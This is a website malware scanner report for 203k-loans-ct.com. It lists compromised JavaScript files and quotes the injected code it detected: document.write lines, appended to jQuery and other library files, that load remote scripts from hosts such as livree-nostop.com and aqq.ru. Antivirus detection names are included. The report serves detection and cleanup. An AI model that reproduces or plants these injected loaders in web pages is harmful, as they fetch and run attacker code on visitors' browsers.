New scan:

Malware Scanner report for 203k-loans-ct.com

Malicious/Suspicious/Total urls checked
4/11/15
15 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "203k-loans-ct.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=203k-loans-ct.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://203k-loans-ct.com/
200 OK
Content-Length: 19157
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://7487.aqq.ru/fhxH9WLK.php?id=9713739"></script>

http://203k-loans-ct.com/_include/js/jquery.js
200 OK
Content-Length: 77950
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161764"></script>');

http://203k-loans-ct.com/_include/js/jquery.badBrowser.js
200 OK
Content-Length: 1805
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161757"></script>');

http://203k-loans-ct.com/_include/js/jquery.tools.js
200 OK
Content-Length: 207
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161768"></script>');

http://203k-loans-ct.com/_include/js/jquery.easing.js
200 OK
Content-Length: 8269
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(t/=d)*t b;
},
easeOutQuad: function (x, t, b, c, d) {
return -c *(t/=d)*(t-2) b;
},
easeInOutQuad: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t b;
retur
... 4175 bytes are skipped ...
t-=(1.5/2.75))*t .75) b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t .9375) b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t .984375) b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 c*.5 b;
}
});
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/cufon.js
200 OK
Content-Length: 39657
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161754"></script>');

http://203k-loans-ct.com/_include/js/Vera_400-Vera_700-Vera_oblique_400-Vera_oblique_700.font.js
200 OK
Content-Length: 181022
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161753"></script>');

http://203k-loans-ct.com/_include/js/jquery.prettyPhoto.js
200 OK
Content-Length: 29835
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161767"></script>');

http://203k-loans-ct.com/_include/js/jquery.hoverInt.js
200 OK
Content-Length: 3380
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){

$.fn.hoverIntent = function(f,g) {
var cfg = {
sensitivity: 7,
interval: 100,
timeout: 0
};
cfg = $.extend(cfg, g ? { over: f, out: g } : f );
var cX, cY, pX, pY;
var track = function(ev) {
cX = ev.pageX;
cY = ev.pageY;
};
var compare = function(ev,ob) {
ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
if ( ( Math.abs(pX-cX) Math.abs(pY-cY) ) < cfg.sensitivi
... 954 bytes are skipped ...
$(ob).bind("mousemove",track);
if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}
} else {
$(ob).unbind("mousemove",track);
if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
}
};
return this.mouseover(handleHover).mouseout(handleHover);
};
})(jQuery);
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/jquery.bgiframe.js
200 OK
Content-Length: 1931
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161758"></script>');

http://203k-loans-ct.com/_include/js/superfish.js
200 OK
Content-Length: 3906
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){
$.fn.superfish = function(op){
var sf = $.fn.superfish,
c = sf.c,
$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
over = function(){
var $$ = $(this), menu = getMenu($$);
clearTimeout(menu.sfTimer);
$$.showSuperfishUl().siblings().hideSuperfishUl();
},
out = function(){
var $$ = $(this), menu = getMenu($$), o = sf.op;
clearTimeout(menu.sfTimer);
men
... 2869 bytes are skipped ...
);
return this;
},
showSuperfishUl : function(){
var o = sf.op,
sh = sf.c.shadowClass '-off',
$ul = this.addClass(o.hoverClass)
.find('>ul:hidden').css('visibility','visible');
sf.IE7fix.call($ul);
o.onBeforeShow.call($ul);
$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
return this;
}
});
})(jQuery);
document.write('<img src="http://localhost/" >');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AMJ [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.BQM
TrendMicro-HouseCall
HTML_IFRAME.ACD
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
TrendMicro
HTML_IFRAME.ACD
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BQM
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BQM
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.UW
GData
Trojan.Iframe.BQM
Commtouch
IFrame.gen
BitDefender
Trojan.Iframe.BQM

http://203k-loans-ct.com/_include/js/swfobject.js
200 OK
Content-Length: 10425
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=
... 9745 bytes are skipped ...
n.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X ){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=") 1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/jquery.captify.js
200 OK
Content-Length: 5749
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161759"></script>');

http://203k-loans-ct.com/_include/js/custom.js
200 OK
Content-Length: 2250
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161755"></script>');

http://203k-loans-ct.com/_include/js/jqplot/jquery.jqplot.js
200 OK
Content-Length: 298822
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=9713792"></script>');


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 203k-loans-ct.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT

...19157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com

Result:
The result is similar to the first query. There are no suspicious redirects found.